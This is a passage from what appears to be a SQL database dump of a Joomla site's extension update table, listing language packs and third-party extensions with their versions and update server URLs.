DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11842,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11843,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11844,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11845,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11846,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11847,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11848,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11849,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11850,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11851,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11852,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11853,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11854,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11855,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11856,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11857,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11858,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11859,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11860,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11861,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11862,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11863,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11864,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11865,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11866,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11867,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11868,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11869,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11870,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11871,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11872,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11873,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11874,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11875,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11876,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11877,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11878,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11879,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11880,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11881,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11882,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11883,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11884,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11885,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11886,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11887,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11888,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11889,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11890,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11891,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11892,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11893,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11894,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11895,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11896,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11897,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11898,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11899,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11900,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11901,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11902,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11903,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11904,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11905,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11906,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11907,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11908,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11909,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11910,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11911,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11912,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11913,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11914,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11915,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11916,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11917,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11918,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11919,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11920,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11921,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11922,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11923,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11924,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11925,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11926,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11927,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11928,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11929,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11930,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11931,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11932,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11933,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11934,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11935,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11936,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11937,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11938,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11939,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11940,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11941,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11942,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11943,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11944,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11945,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11946,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11947,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11948,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11949,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11950,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11951,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11952,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11953,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11954,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11955,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11956,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11957,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11958,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11959,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11960,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11961,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11962,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11963,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11964,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11965,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11966,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11967,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11968,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11969,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11970,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11971,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11972,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11973,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11974,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11975,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11976,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11977,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11978,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11979,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11980,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11981,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11982,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11983,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11984,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11985,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11986,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11987,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11988,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11989,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11990,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11991,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11992,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11993,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11994,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11995,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11996,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11997,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11998,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11999,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(12000,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(12001,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(12002,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(12003,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(12004,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(12005,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(12006,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(12007,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(12008,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(12009,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(12010,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(12011,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(12012,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(12013,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(12014,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(12015,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(12016,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(12017,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(12018,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(12019,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(12020,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(12021,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(12022,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(12023,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(12024,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(12025,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(12026,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(12027,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(12028,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(12029,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12030,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(12031,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(12032,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(12033,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12034,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(12035,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12036,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12037,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(12038,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(12039,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(12040,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(12041,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(12042,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(12043,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(12044,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(12045,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(12046,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(12047,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(12048,3,0,'Chinese 